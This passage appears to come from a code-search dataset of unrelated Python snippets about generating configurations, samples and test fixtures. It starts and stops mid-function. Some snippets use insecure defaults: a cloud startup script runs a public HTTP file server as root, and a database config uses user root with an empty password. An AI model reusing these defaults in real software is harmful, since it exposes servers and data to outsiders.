NuscenesGenerator(\n nusc,\n scene_indices=scenes.test_night,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n\n test_rain_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.test_rain,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n return train_generator, validation_generator, test_generator, test_night_generator, test_rain_generator\n else:\n raise ValueError('Invalid data type received: {}'.format(cfg.data_set))", "def generateConfig(run,subrun,conditions):\n \n configname = (conditions.numcdir + \"/\" + str(run) + \"/\" + str(subrun)\n + \"/numc_config_\" + str(run) + \"_\" + str(subrun) + \".cfg\")\n \n configContents = \"\"\n \n configContents += \"[software]\\n\"\n if conditions.oldneut:\n configContents += \"neut_setup_script = /project/t/tanaka/T2K/neut/branches/5.1.4.2_nd280_ROOTv5r34p09n01/src/neutgeom/setup.sh\\n\"\n elif conditions.newoldneut:\n configContents += \"neut_setup_script = /project/t/tanaka/T2K/neut/branches/5.1.4.3_nd280/src/neutgeom/setup.sh\\n\"\n else:\n #configContents += \"neut_setup_script = /project/t/tanaka/T2K/neut/branches/5.3.1_nd280/src/neutgeom/setup.sh\\n\"\n #configContents += \"neut_setup_script = /project/t/tanaka/T2K/neut/branches/5.3.1_nd280_wBBBA05/src/neutgeom/setup.sh\\n\"\n configContents += \"neut_setup_script = /project/t/tanaka/T2K/neut/branches/5.3.2_nd280/src/neutgeom/setup.sh\\n\"\n \n configContents += \"[geometry]\\n\"\n\n configContents += \"baseline = \" + conditions.geometry +\"\\n\"\n if conditions.waterair == \"water\":\n configContents += \"p0d_water_fill = 1\\n\"\n else:\n configContents += \"p0d_water_fill = 0\\n\"\n \n configContents += \"\"\"\n \n[configuration]\nmodule_list = neutMC\n\n[filenaming]\n\"\"\"\n configContents += \"comment = \" + conditions.comment + \"\\n\"\n configContents += \"run_number = \" + str(run) +\"\\n\"\n configContents += \"subrun = \" + str(subrun) + \"\\n\"\n\n if conditions.oldneut:\n configContents += \"\"\" \n\n[neutrino]\nneut_card = /project/t/tanaka/T2K/neut/branches/5.1.4.2_nd280_ROOTv5r34p09n01/src/neutgeom/neut.card\n\"\"\"\n elif conditions.newoldneut:\n configContents += \"\"\" \n\n[neutrino]\nneut_card = /project/t/tanaka/T2K/neut/branches/5.1.4.3_nd280/src/neutgeom/neut.card\n\"\"\"\n else:\n configContents += \"\"\" \n\n[neutrino]\nneut_card = /project/t/tanaka/T2K/neut/branches/5.3.2_nd280/src/neutgeom/neut.card\n\"\"\"\n\n configContents += \"flux_file = \" + conditions.ram_disk + \"/\" + conditions.flux_base + \"\\n\"\n\n#flux_file = flux_file\n#\"\"\"\n\n# configContents += \"flux_file_path = \" + conditions.ram_disk + \"/\" + conditions.flux_base\n\n# configContents += \"\"\" \n#flux_file_start = 1\n#flux_file_stop = 300\n#\"\"\"\n\n configContents += \"maxint_file = \" + conditions.maxint_file_local + \"\\n\"\n\n# default: 5e17 but for basket MC special production higher\n configContents += \"\"\" \npot = 5.0e17\nneutrino_type = beam\n\"\"\"\n if conditions.baskmagn == \"basket\":\n configContents += \"\"\" \nflux_region = basket\nmaster_volume = Basket \nrandom_start = 1\n\"\"\"\n elif conditions.baskmagn == \"magnet\":\n configContents += \"\"\" \nflux_region = magnet\nmaster_volume = Magnet \nrandom_start = 1\n\"\"\"\n else:\n print \"Unknown basket/magnet condition\"\n \n\n configContents += \"random_seed = \" + str(getRandom()) +\"\\n\"\n configContents += \"neut_seed1 = \" + str(getRandom())+\"\\n\" \n configContents += \"neut_seed2 = \" + str(getRandom())+\"\\n\" \n configContents += \"neut_seed3 = \" + str(getRandom())+\"\\n\" \n\n configContents += \"\\n\"\n configContents += \"[nd280mc]\\n\"\n configContents += \"mc_type=Neut_RooTracker \\n\"\n\n #print configContents\n\n try:\n macFile = open(configname,\"w\")\n macFile.write(configContents)\n \n except:\n print \"can't write config file\" \n \n\n return configname", "def genConfig():\n\n cfg = open('/home/sevudan/Scripts/projects/topogen/result.cfg','w')\n template = getTemplate()\n G = topo.topology()\n gen_config_lo(G, cfg)\n # Get node from list nodes.\n for node in sorted(G.nodes):\n d = dict(G[node])\n hostname = node\n # Get attributes for node.\n peer = d.keys()\n for peer_node in peer:\n params = d.get(peer_node)\n conf = template.render(\n node=hostname,\n description = peer_node,\n ifd = params.get('ifd'),\n local_ifl = params.get('local_ifl'),\n peer_ifl = params.get('peer_ifl'),\n ifa = params.get('ip_address')\n )\n result = '{}{}'.format(conf,'\\n')\n cfg.write(result)\n cfg.close()", "def config():\n experiment_dir = './experiments'\n simulation_steps = 1000\n device = 'cpu'\n path_to_molecules = os.path.join(experiment_dir, 'data/ethanol.xyz')\n simulation_dir = os.path.join(experiment_dir, 'simulation')\n training_dir = os.path.join(experiment_dir, 'training')\n model_path = os.path.join(training_dir, 'best_model')\n overwrite = True", "def GenerateConfig(context):\n\n resources = [{\n 'name': context.env['name'],\n 'type': 'compute.v1.instance',\n 'properties': {\n 'zone': context.properties['zone'],\n 'machineType': ''.join([COMPUTE_URL_BASE, 'projects/',\n context.env['project'], '/zones/',\n context.properties['zone'], '/machineTypes/',\n context.properties['machineType']]),\n 'disks': [{\n 'deviceName': 'boot',\n 'type': 'PERSISTENT',\n 'boot': True,\n 'autoDelete': True,\n 'initializeParams': {\n 'sourceImage': ''.join([COMPUTE_URL_BASE, 'projects/',\n 'ubuntu-os-cloud/global/',\n 'images/family/ubuntu-1604-lts'])\n }\n }],\n 'networkInterfaces': [{\n 'network': '$(ref.' + context.properties['network']\n + '.selfLink)',\n 'accessConfigs': [{\n 'name': 'External NAT',\n 'type': 'ONE_TO_ONE_NAT'\n }]\n }],\n 'metadata': {\n 'items': [{\n 'key': 'startup-script',\n 'value': ''.join(['#!/bin/bash\\n',\n 'sudo apt-get install openjdk-9-jre-headless -y\\n',\n 'sudo python -m SimpleHTTPServer 80'])\n }]\n }\n }\n }]\n return {'resources': resources}", "def bos_fixture():\n block_config = {\n \"Clock\": {\"start_time\": 0,\n \"end_time\": 10,\n \"num_steps\": 100},\n \"PhysicsModules\": {\n \"BlockOnSpring\": {\n \"mass\": 1,\n \"spring_constant\": 1,\n \"pusher\": \"Leapfrog\",\n \"x0\": [0, 1, 0],\n }\n },\n \"Tools\": {\n \"Leapfrog\": {},\n \"ForwardEuler\": {},\n \"BackwardEuler\": {}\n },\n \"Diagnostics\": {\n # default values come first\n \"directory\": \"test_output/\",\n \"output_type\": \"csv\",\n \"clock\": {\"filename\": \"time.csv\"},\n \"BlockDiagnostic\": [\n {'component': 'momentum', 'filename': 'block_p.csv'},\n {'component': 'position', 'filename': 'block_x.csv'}\n ]\n }\n }\n\n return block_config", "def testgen(self):\n self.parse()\n self.generate()", "def generate(self, no_samples):\n raise NotImplementedError(\"Implement this method.\")", "def test_happy_generate_config(self):\n yaml_input = yaml.load(MOCK_YAML)\n yaml_with_dot_notation = common.dotdict(yaml_input)\n generate_config_return = subnets_template.generate_config(yaml_with_dot_notation)\n self.assertEquals(generate_config_return, EXPECTED_OUTPUT)", "def generateDefaultConfig(self):\n\n\t\t# Open config.ini in write mode\n\t\tf = open(self.fileName, \"w\")\n\n\t\t# Set keys to config object\n\t\tself.config.add_section(\"db\")\n\t\tself.config.set(\"db\", \"host\", \"localhost\")\n\t\tself.config.set(\"db\", \"username\", \"root\")\n\t\tself.config.set(\"db\", \"password\", \"\")\n\t\tself.config.set(\"db\", \"database\", \"ripple\")\n\t\tself.config.set(\"db\", \"pingtime\", \"600\")\n\n\t\tself.config.add_section(\"server\")\n\t\tself.config.set(\"server\", \"server\", \"tornado\")\n\t\tself.config.set(\"server\", \"host\", \"0.0.0.0\")\n\t\tself.config.set(\"server\", \"port\", \"5001\")\n\t\tself.config.set(\"server\", \"localizeusers\", \"1\")\n\t\tself.config.set(\"server\", \"outputpackets\", \"0\")\n\t\tself.config.set(\"server\", \"outputrequesttime\", \"0\")\n\t\tself.config.set(\"server\", \"timeoutlooptime\", \"100\")\n\t\tself.config.set(\"server\", \"timeouttime\", \"100\")\n\n\t\tself.config.add_section(\"flask\")\n\t\tself.config.set(\"flask\", \"threaded\", \"1\")\n\t\tself.config.set(\"flask\", \"debug\", \"0\")\n\t\tself.config.set(\"flask\", \"logger\", \"0\")\n\n\t\tself.config.add_section(\"ci\")\n\t\tself.config.set(\"ci\", \"key\", \"changeme\")\n\n\t\t# Write ini to file and close\n\t\tself.config.write(f)\n\t\tf.close()", "def test_case_3(self):\n config_generator = Genesis()\n\n data = open_json_file('r1.json')\n\n task_1 = Task.new(data=data, name=\"R1_BASE_CONFIG\")\n task_2 = Task.new(data=data, name=\"R1_BASE_CONFIG_2\")\n\n config_generator.add_task(task_1)\n config_generator.add_task(task_2)\n\n results = config_generator.generate()\n self.assertIsInstance(results, dict)\n\n for task in config_generator.tasks:\n self.assertTrue(task.is_complete)\n self.assertIsInstance(task.rendered_data, str)", "def get_random_sweeps(self, k):\n\t\tfor _ in range(k):\n\t\t\tmodel_config = copy.copy(self._model_config.to_dict())\n\t\t\tsampled_config = self._sample_hyperparameters()\n\t\t\tfor k, v in sampled_config.items():\n\t\t\t\tmodel_config[k] = v\n\n\t\t\tmodel_config_md_wrapper = ModelConfigMetadataWrapper(sampled_config=sampled_config,\n\t\t\t\tmetrics_dir=self._metrics_dir, **model_config)\n\t\t\tself._generated_configs.append(model_config_md_wrapper)\n\t\t\tyield model_config_md_wrapper", "def create_samples(self):\n self._samples = self.load_samples()\n self.modify_samples()", "def create_config(self, context, mgmtport):\n pass", "def config_skeleton():\n config = Config()\n config.set_to_default()\n config.save()", "def main():\n\targs = getArgs()\n\tid_question = args.id_question\n\tlang = args.language\n\tdir_cp = None\n\twith open('config.json') as json_file:\n\t\tconfig_data = json.load(json_file)\n\t\tdir_cp = config_data['dir_cp']\n\n\t\n\t\n\t# sample_io = GetData(args.id_question).get_uri_io_sample()\n\ttemplate = FileUtil(id_question, dir_cp['path'], lang)\n\ttemplate.write_template()\n\t# print(sample_io)", "def createConfig():\n\twith open(configPath, 'w', encoding='utf-8') as file:\n\t\tjson.dump(default_config, file, indent=3)", "def test_config_spec(self):\n spec = self._gen.config_spec()\n self.assertIn('Number of examples', spec)\n self.assertIn('Maximum number of columns to change', spec)\n self.assertIn('Regression threshold', spec)\n self.assertIn('Prediction key', spec)", "def config():", "def config():", "def _create_sample(self, policy_output, next_state, reward, done, info,\n env_id):\n return {\n \"policy_output\": policy_output,\n \"next_state\": next_state,\n \"reward\": reward,\n \"done\": done,\n \"info\": info,\n \"env_id\": env_id\n }", "def testRunConfiguration(self):\n loader = Loader()\n loader.loadFromDirectory(self.__exampleDirectory)\n\n self.assertEqual(len(loader.taskHolders()), 1)\n\n taskHolder = loader.taskHolders()[0]\n\n taskHolder.addVar(\n \"prefix\",\n self.__exampleTargetPrefixDirectory,\n True\n )\n\n # loading input data for the execution\n crawlerGroups = Crawler.group(\n FsCrawler.createFromPath(\n os.path.join(self.__exampleDirectory, 'textures')\n ).globFromParent()\n )\n\n resultCrawlers = []\n for group in crawlerGroups:\n if isinstance(group[0], Crawler.registeredType('texture')):\n resultCrawlers += taskHolder.run(group)\n\n targetFilePaths = list(sorted(filter(lambda x: len(x), map(lambda x: x.strip(), self.__generatedData.split('\\n')))))\n createdFilePaths = list(sorted(map(lambda x: x.var('fullPath')[len(self.__exampleTargetPrefixDirectory) + 1:].replace('\\\\', '/'), resultCrawlers)))\n\n self.assertListEqual(targetFilePaths, createdFilePaths)", "def run(self):\n write_config(self.filename)\n print('Wrote default config to', self.filename)", "def _generate_global_config() -> str:\n logger = getLogger(__name__)\n dst = os.path.join(os.path.expanduser(\"~\"),\n \".aiscalator/config/aiscalator.conf\")\n logger.info(\"Generating a new configuration file for aiscalator:\\n\\t%s\",\n dst)\n pattern = [\n \"testUserID\",\n \"generation_date\",\n ]\n replace_value = [\n generate_user_id(),\n '\"' + str(datetime\n .utcnow()\n .replace(tzinfo=timezone(\"UTC\"))) +\n '\" // in UTC timezone',\n ]\n dst_dir = os.path.dirname(dst)\n if dst_dir:\n os.makedirs(dst_dir, exist_ok=True)\n copy_replace(data_file(\"../config/template/aiscalator.conf\"),\n dst, pattern=pattern, replace_value=replace_value)\n open(os.path.join(dst_dir, \"apt_packages.txt\"), 'a').close()\n open(os.path.join(dst_dir, \"requirements.txt\"), 'a').close()\n open(os.path.join(dst_dir, \"lab_extensions.txt\"), 'a').close()\n return dst", "def get_test_generator(cf, logger):\n # set up as method to read source data over the whole space (except annotated tiles)\n # and produce generated tiles\n config_file = os.environ[CONFIG_ENV_VAR]\n config = load_config(config_file)\n\n generate_full_output = GENERATE_FULL in os.environ\n\n if generate_full_output:\n # specify all covered tiles\n logger.info(\"Producing output for full data\")\n num_subdirs = len(config[\"subdir_paths\"])\n batch_data = []\n if GENERATE_SUBDIR in os.environ:\n generate_subdirs = [int(os.environ[GENERATE_SUBDIR])]\n else:\n generate_subdirs = range(num_subdirs)\n for subdir_num in generate_subdirs:\n annot_map, _, _ = get_annot_map(config, subdir_num)\n logger.info(\n \"Subdir %d, %d covered tiles\" % (subdir_num, annot_map.sum())\n )\n valid_tiles = np.stack(np.where(annot_map > 0), axis=1)\n batch_data.extend([(subdir_num, t) for t in valid_tiles])\n\n else:\n # choose tiles to output. if preferred tiles are specified, try using each\n # preferred tiles if it is not yet defined, and choose random subdir/tiles for\n # remaining\n # first define maps for each subdir\n subdir_maps = {}\n for subdir_num in range(len(config[\"subdir_paths\"])):\n # generate tiles from unannotated regions\n annot_map, annot_header, annotation_scale = get_annot_map(\n config, subdir_num\n )\n\n completed_map = get_completed_map(\n config, subdir_num, annot_map.shape\n )\n in_progress_map = get_completed_map(\n config, subdir_num, annot_map.shape, find_in_progress=True\n )\n incomplete_map = annot_map - completed_map - in_progress_map\n subdir_maps[subdir_num] = (\n annot_map,\n completed_map,\n in_progress_map,\n incomplete_map,\n )\n\n # check each preferred tile in turn\n chosen_tiles_list = []\n num_generate = config[\"generate_number_tiles\"]\n specified_subdir_num = None\n if GENERATE_SUBDIR in os.environ:\n specified_subdir_num = int(os.environ[GENERATE_SUBDIR])\n\n for index_vals in get_tiles_of_interest(config):\n subdir_num = index_vals[0]\n if (\n specified_subdir_num is not None\n and subdir_num != specified_subdir_num\n ):\n # only choose preferred tiles with given subdir number if specified\n continue\n index_number = np.array(index_vals[1:])\n annot_map, completed_map, in_progress_map, _ = subdir_maps[\n subdir_num\n ]\n try:\n check_index(index_number, completed_map, annot_map)\n check_index(index_number, in_progress_map, annot_map)\n except RuntimeError as e:\n # piece is already annotated/in-progress, or invalid\n logger.info(\n \"Skipping preferred tile %s, reason %s\" % (index_vals, e)\n )\n continue\n # piece is valid\n chosen_tiles_list.append(index_vals)\n if len(chosen_tiles_list) == num_generate:\n break\n\n logger.info(\"Using preferred tiles: %s\" % (chosen_tiles_list,))\n\n # choose a number of random tiles for remaining\n for _ in range(num_generate - len(chosen_tiles_list)):\n if specified_subdir_num is None:\n # choose a random subdir\n subdir_num = np.random.randint(len(config[\"subdir_paths\"]))\n else:\n subdir_num = specified_subdir_num\n (\n annot_map,\n completed_map,\n in_progress_map,\n incomplete_map,\n ) = subdir_maps[subdir_num]\n\n logger.info(\n \"Choosing random tile from subdir %d, %d incomplete tiles out of %d\"\n % (subdir_num, incomplete_map.sum(), annot_map.sum())\n )\n\n # choose tile to cover\n incomplete_tiles = np.stack(np.where(incomplete_map > 0), axis=1)\n chosen_set_index = np.random.randint(incomplete_tiles.shape[0])\n chosen_tile_index = incomplete_tiles[chosen_set_index] # (3,)\n chosen_tiles_list.append([subdir_num] + chosen_tile_index.tolist())\n\n logger.info(\"Chosen tiles: %s\" % (chosen_tiles_list,))\n\n # todo: find sections for incomplete tiles? need to find how this is done with the automated\n # overlapping tile selection\n\n # # for now just choose an origin section from each tile\n # test_sections = [x * annotation_scale for x in chosen_tiles]\n # logger.info(\"Using %d incomplete sections\" % (len(test_sections),))\n\n # create data as a list of tuples, each with the subdir number and tile index\n batch_data = [(x[0], x[1:]) for x in chosen_tiles_list]\n\n batch_gen = {}\n batch_iterator = PatientBatchIterator(\n batch_data, cf, config, generate_full_output\n )\n batch_gen[\"test\"] = batch_iterator\n # batch_gen[\"test\"] = create_data_gen_pipeline(\n # test_sections,\n # cf=cf,\n # annotation_config=config,\n # is_training=False,\n # segments_defined=False,\n # )\n\n # find how many patches per instance\n # patch_size = batch_iterator.patch_size\n # patch_crop_coords_list = dutils.get_patch_crop_coords(\n # np.zeros(config[\"annotation_size\"]), patch_size, min_overlap=np.array(patch_size).min()\n # )\n\n # print(\"num patches %d\" % len(patch_crop_coords_list))\n # batch_gen[\"n_test\"] = len(patch_crop_coords_list) # test_sections)\n # batch_gen[\"n_test\"] = len(chosen_tiles)\n batch_gen[\"n_test\"] = min(len(batch_data), config[\"generate_number_tiles\"])\n\n # set up for full export if parameter defined in environ\n if generate_full_output:\n batch_gen[\"exporter\"] = BatchExporter(cf, config)\n batch_gen[\"repeat_test_output\"] = True\n return batch_gen", "def generate_arguments(config_filename):\n\n with open(config_filename, \"r\") as f:\n config = json.load(f)\n\n rng_state = np.random.get_state()\n np.random.seed(config[\"seed\"])\n\n # Maximum total number of sources\n n_sources = np.max(config[\"n_channels_list\"])\n\n # First we randomly select all the speech samples\n gen_files_seed = int(np.random.randint(2 ** 32, dtype=np.uint32))\n all_wav_files = sampling(\n config[\"n_repeat\"],\n n_sources,\n config[\"samples_list\"],\n gender_balanced=True,\n seed=gen_files_seed,\n )\n\n # now get the transcripts\n with open(config[\"samples_list\"]) as f:\n dataset_metadata = json.load(f)\n\n all_transcripts = []\n for subset in all_wav_files:\n transcripts = []\n for fn in subset:\n transcripts.append(dataset_metadata[\"transcripts\"][Path(fn).name])\n all_transcripts.append(transcripts)\n\n # Pick the seeds to reproducibly build a bunch of random rooms\n room_seeds = np.random.randint(\n 2 ** 32, size=config[\"n_repeat\"], dtype=np.uint32\n ).tolist()\n\n args = []\n for n_channels in config[\"n_channels_list\"]:\n for room_id, (wav_files, transcripts, room_seed) in enumerate(\n zip(all_wav_files, all_transcripts, room_seeds)\n ):\n\n # add the new combination to the list\n args.append(\n [\n n_channels,\n room_id,\n room_seed,\n wav_files[:n_channels],\n transcripts[:n_channels],\n config_filename,\n ]\n )\n\n np.random.set_state(rng_state)\n\n return args", "def test_config():\n assert not sample.create_app().testing\n assert sample.create_app({\"TESTING\": True}).testing", "def generator_params_fixture(\n tmpdir_factory, json_frame_specification_fixture, random_seed_fixture\n):\n\n params = dict()\n params[\"pre_post_omission\"] = 0\n params[\"total_samples\"] = -1\n params[\"name\"] = \"MovieJSONGenerator\"\n params[\"start_frame\"] = 0\n params[\"end_frame\"] = -1\n params[\"pre_frame\"] = 2\n params[\"post_frame\"] = 2\n params[\"randomize\"] = True\n params[\"data_path\"] = json_frame_specification_fixture[\"json_path\"]\n params[\"steps_per_epoch\"] = -1\n params[\"train_path\"] = json_frame_specification_fixture[\"json_path\"]\n params[\"type\"] = \"generator\"\n params[\"seed\"] = random_seed_fixture\n return params", "def setUpConfig(self):\n pass", "def make_config(outfile, sample_rate, numof_channels, mode, server = 'localhost', shape = 'None',\n security_mode = False, saving_mode = False, data_file = 'Nofile', format = 'binary',\n resolution = 0.1, returning_speed = 8, channels = 0,\n color_bg = 'white', color_trigger = 'black',\n size_window = (1000, 800)):\n\n\n config = ConfigParser.RawConfigParser()\n\n config.add_section('technics')\n config.add_section('visualization')\n config.add_section('security')\n config.add_section('data')\n\n config.set('technics', 'sample_rate', sample_rate)\n config.set('technics', 'numof_channels', numof_channels)\n config.set('technics', 'server', server)\n config.set('technics', 'resolution', resolution)\n config.set('technics', 'speed', returning_speed)\n if channels == 0:\n channels = range(numof_channels+1)[1:numof_channels+1]\n config.set('technics', 'channels', channels)\n\n config.set('visualization', 'mode', mode)\n config.set('visualization', 'color_bg', color_bg)\n config.set('visualization', 'color_trigger', color_trigger)\n config.set('visualization', 'size_window', size_window)\n\n config.set('security', 'security_mode', security_mode)\n\n config.set('data', 'saving_mode', saving_mode)\n config.set('data', 'file', data_file)\n config.set('data', 'format', format)\n\n config_file = open(outfile, 'w+')\n\n config.write(config_file)", "def get_generated_config(self, auth_provider: KeyProvider, secret_key):\n\n generated_config = {\n 'jupyterhub': {\n 'proxy': {\n 'https': {\n 'hosts': [self.spec['domain']]\n }\n },\n 'ingress': {\n 'hosts': [self.spec['domain']],\n 'tls': [\n {\n 'secretName': 'https-auto-tls',\n 'hosts': [self.spec['domain']]\n }\n ]\n\n },\n 'singleuser': {\n # If image_repo isn't set, just have an empty image dict\n 'image': {'name': self.cluster.spec['image_repo']} if 'image_repo' in self.cluster.spec else {},\n },\n 'hub': {\n 'config': {},\n 'initContainers': [\n {\n 'name': 'templates-clone',\n 'image': 'alpine/git',\n 'args': [\n 'clone',\n '--',\n 'https://github.com/2i2c-org/pilot-homepage',\n '/srv/repo',\n ],\n 'securityContext': {\n 'runAsUser': 1000,\n 'allowPrivilegeEscalation': False,\n 'readOnlyRootFilesystem': True,\n },\n 'volumeMounts': [\n {\n 'name': 'custom-templates',\n 'mountPath': '/srv/repo'\n }\n ]\n }\n ],\n 'extraContainers': [\n {\n 'name': 'templates-sync',\n 'image': 'alpine/git',\n 'workingDir': '/srv/repo',\n 'command': ['/bin/sh'],\n 'args': [\n '-c',\n dedent(\n f'''\\\n while true; do git fetch origin;\n if [[ $(git ls-remote --heads origin {self.spec[\"name\"]} | wc -c) -ne 0 ]]; then\n git reset --hard origin/{self.spec[\"name\"]};\n else\n git reset --hard origin/master;\n fi\n sleep 5m; done\n '''\n )\n ],\n 'securityContext': {\n 'runAsUser': 1000,\n 'allowPrivilegeEscalation': False,\n 'readOnlyRootFilesystem': True,\n },\n 'volumeMounts': [\n {\n 'name': 'custom-templates',\n 'mountPath': '/srv/repo'\n }\n ]\n }\n ],\n 'extraVolumes': [\n {\n 'name': 'custom-templates',\n 'emptyDir': {}\n }\n ],\n 'extraVolumeMounts':[\n {\n 'mountPath': '/usr/local/share/jupyterhub/custom_templates',\n 'name': 'custom-templates',\n 'subPath': 'templates'\n },\n {\n 'mountPath': '/usr/local/share/jupyterhub/static/extra-assets',\n 'name': 'custom-templates',\n 'subPath': 'extra-assets'\n }\n ]\n }\n },\n }\n #\n # Allow explicilty ignoring auth0 setup\n if self.spec['auth0'].get('enabled', True):\n # Auth0 sends users back to this URL after they authenticate\n callback_url = f\"https://{self.spec['domain']}/hub/oauth_callback\"\n # Users are redirected to this URL after they log out\n logout_url = f\"https://{self.spec['domain']}\"\n client = auth_provider.ensure_client(\n name=self.spec['auth0'].get('application_name', f\"{self.cluster.spec['name']}-{self.spec['name']}\"),\n callback_url=callback_url,\n logout_url=logout_url,\n connection_name=self.spec['auth0']['connection'],\n connection_config=self.spec['auth0'].get(self.spec['auth0']['connection'], {}),\n )\n # FIXME: We're hardcoding Auth0OAuthenticator here\n # We should *not*. We need dictionary merging in code, so\n # these can all exist fine.\n generated_config['jupyterhub']['hub']['config']['Auth0OAuthenticator'] = auth_provider.get_client_creds(client, self.spec['auth0']['connection'])\n\n return self.apply_hub_template_fixes(generated_config, secret_key)", "def _prepare_samples(args):\n if args.galaxy:\n system_config = args.galaxy\n else:\n system_config = os.path.join(_get_data_dir(), \"galaxy\", \"bcbio_system.yaml\")\n config = yaml.load(open(system_config))\n config['algorithm'] = {}\n data = []\n vcf_files = [fn for fn in args.files if fn.endswith('vcf')]\n bam_files = [fn for fn in args.files if fn.endswith('bam')]\n fastq_files = [fn for fn in args.files if is_fastq(fn)]\n if not fastq_files:\n fastq_files = vcf_files\n for sample in fastq_files:\n dt = {}\n dt['name'] = splitext_plus(op.basename(sample))[0]\n dt['config'] = config\n dt['fastq'] = op.abspath(sample)\n if bam_files:\n dt['bam'] = _find_bam(bam_files, sample)\n data.append([dt])\n return data", "def configuration(config):\n create_str_dir(config)\n add_skymap(config)\n save_configuration(config)", "def _configure(self):\n test_lib.test_config.setdefault('config_files', []).append(\n self.filename)\n self._write_config_content()", "def mock_config():\n from .. import config\n\n _old_fs = os.getenv('FREESURFER_HOME')\n if not _old_fs:\n os.environ['FREESURFER_HOME'] = mkdtemp()\n\n filename = Path(pkgrf('fmriprep', 'data/tests/config.toml'))\n settings = loads(filename.read_text())\n for sectionname, configs in settings.items():\n if sectionname != 'environment':\n section = getattr(config, sectionname)\n section.load(configs, init=False)\n config.nipype.omp_nthreads = 1\n config.nipype.init()\n config.loggers.init()\n config.init_spaces()\n\n config.execution.work_dir = Path(mkdtemp())\n config.execution.bids_dir = Path(pkgrf('fmriprep', 'data/tests/ds000005')).absolute()\n config.execution.fmriprep_dir = Path(mkdtemp())\n config.execution.init()\n\n yield\n\n shutil.rmtree(config.execution.work_dir)\n shutil.rmtree(config.execution.fmriprep_dir)\n\n if not _old_fs:\n del os.environ[\"FREESURFER_HOME\"]", "def module_config_template():\n\n d = {\"AWSPricePerformancePublisher\": {\n \"module\": \"modules.AWS.publishers.AWS_price_performance\",\n \"name\": \"AWSPricePerformancePublisher\",\n }, }\n print(\"Entry in channel cofiguration\")\n pprint.pprint(d)\n print(\"where\")\n print(\"\\t name - name of the class to be instantiated by task manager\")\n print(\"\\t publish_to_graphite - publish to graphite if True\")\n print(\"\\t graphite_host - graphite host name\")", "def example_generator(self, mode: str):\n raise NotImplementedError", "def urban_configurations_test():\n gaz = VladGazetteer(TextIOWrapper(resource_stream('pycaptioner', 'test/data/gazetteer_urban.txt')))\n reader = DictReader(TextIOWrapper(resource_stream('pycaptioner', 'test/data/points.csv')))\n for line in reader:\n if line['category'] == 'urban':\n point = geometry.Point(float(line['lon']), float(line['lat']))\n configurations = generate_configurations(point, gaz, 'urban')\n configurations['subject'] = {'dc_title': line['subject']}\n caption = urban_caption(configurations)\n tools.assert_is_not_none(caption)\n caption = generate_caption(caption)\n tools.assert_is_not_none(caption)\n print(caption)\n tools.assert_is_not_none(None)", "def build_config():\n if not os.path.exists(config_path):\n # generate key pair\n priv_key, pub_key = crypt.ecdsa_generate()\n if not priv_key or not pub_key:\n log.error(\"Unable to generate public/private keypair....\")\n exit(0)\n else:\n # fill default config with generated keypair\n base_config['key']['pub'] = pub_key\n base_config['key']['priv'] = priv_key\n\n # dump default config\n log.info(\"Dumping initial config to: %s\", config_path)\n with open(config_path, 'w') as fp:\n json.dump(base_config, fp, sort_keys=True, indent=2)\n return True\n else:\n return False", "def app():\n\n def _app(config_class):\n _app = create_app(config_class)\n seed_collection_with_csv(_app.config['DATA_FILENAME'])\n _app.app_context().push()\n return _app\n\n yield _app('config.TestingConfig')", "def get_configuration_template(self):\n return {'EXAMPLE_KEY_1': \"Example value\",\n 'EXAMPLE_KEY_2': [\"Example\", \"Value\"]\n }", "def main():\n load()\n\n print(generate())", "def trial_config(self, prev_config, cov_config=1e-2):\r\n return prev_config + np.random.normal(0, cov_config, len(prev_config))", "def get_configuration_template(self):\n return {'EXAMPLE_KEY_1': \"Example value\",\n 'EXAMPLE_KEY_2': [\"Example\", \"Value\"]\n }", "def config(self, **kw):\n self.cfg_fixture.config(**kw)", "def generate(self):\n pass", "def generate(self):\n pass", "def generate(self):\n pass", "def dep_sample_generator(path_to_file):\n assert os.path.isfile(path_to_file), \"File does not exist\"\n root = DepSample(0, ROOT, ROOT, 0)\n with open(path_to_file) as fp:\n sample = [root]\n for line in fp:\n if not line.rstrip():\n yield sample\n sample = [root]\n else:\n ls = line.rstrip().split('\\t')\n # print(ls)\n sample.append(DepSample(int(ls[0]), ls[1], ls[3], int(ls[6])))\n if len(sample) > 1:\n yield sample", "def generate(self):\n logger.info(\"Starting yml generation..\")\n if not self.is_generatable_file:\n logger.error(\n f\"[red]Not running file {self.filename} without metadata collector.[/red]\"\n )\n return\n # Collect the wrapped functions with the details.\n self.collect_functions()\n # Make sure when they are ran, only collecting data will be performed.\n if self.metadata_collector:\n self.metadata_collector.set_collect_data(True)\n # Run the functions and by that, collect the data.\n self.run_functions()\n # Write the yml file according to the collected details.\n self.extract_metadata()\n # Make sure the functions are back to normal running state.\n if self.metadata_collector:\n self.metadata_collector.set_collect_data(False)\n # Remove imports from file\n self.remove_collector_imports()", "def _generate_samples(samples_data_table=None):\n samples_data_table = samples_data_table or dict()\n\n con_name = f\"Auto_Sample_Test_{datetime.now()}\"\n con_result_soup = BeautifulSoup(_post_con(con_name), \"xml\")\n con_uri = con_result_soup.find(\"con:container\")[\"uri\"]\n\n sample_list = list()\n for i in range(1, 97, 2):\n well = (\n 'ABCDEFGH'[(i - 1) % 8] + ':' + '%01d' % ((i - 1) // 8 + 1,))\n letter = 'ABCDEFGH'[i % 8]\n to_add = api_types.Sample(f\"test{i}{letter}\")\n to_add.location = well\n to_add.con = api_types.Container(\n con_name,\n \"96 well plate\",\n \"\",\n con_uri)\n\n for data_name, data_value in samples_data_table.items():\n if \"udf\" in data_name:\n udf_name = data_name.strip(\"udf_\")\n to_add.udf_to_value[udf_name] = data_value\n elif \"adapter\" in data_name:\n to_add.adapter = data_value\n sample_list.append(to_add)\n return sample_list", "def generate(self):\n pass", "def get_sample(config, n_sample=1):\n if config['distribution'] == 'binary':\n data = np.random.choice([0, 1], size=n_sample, replace=True, p=config['pmf'])\n\n elif config['distribution'] == 'discrete':\n data = np.random.choice(config['category'], size=n_sample, replace=True, p=config['pmf'])\n\n elif config['distribution'] == 'uniform':\n assert float(config['min']) < float(config['max'])\n data=np.random.uniform(low=float(config['min']),high=float(config['max']),size=n_sample)\n\n elif config['distribution'] == 'gaussian':\n data=np.random.normal(loc=float(config['mean']),scale=float(config['std']),size=n_sample)\n data = np.maximum(data, float(config['min']))\n data = 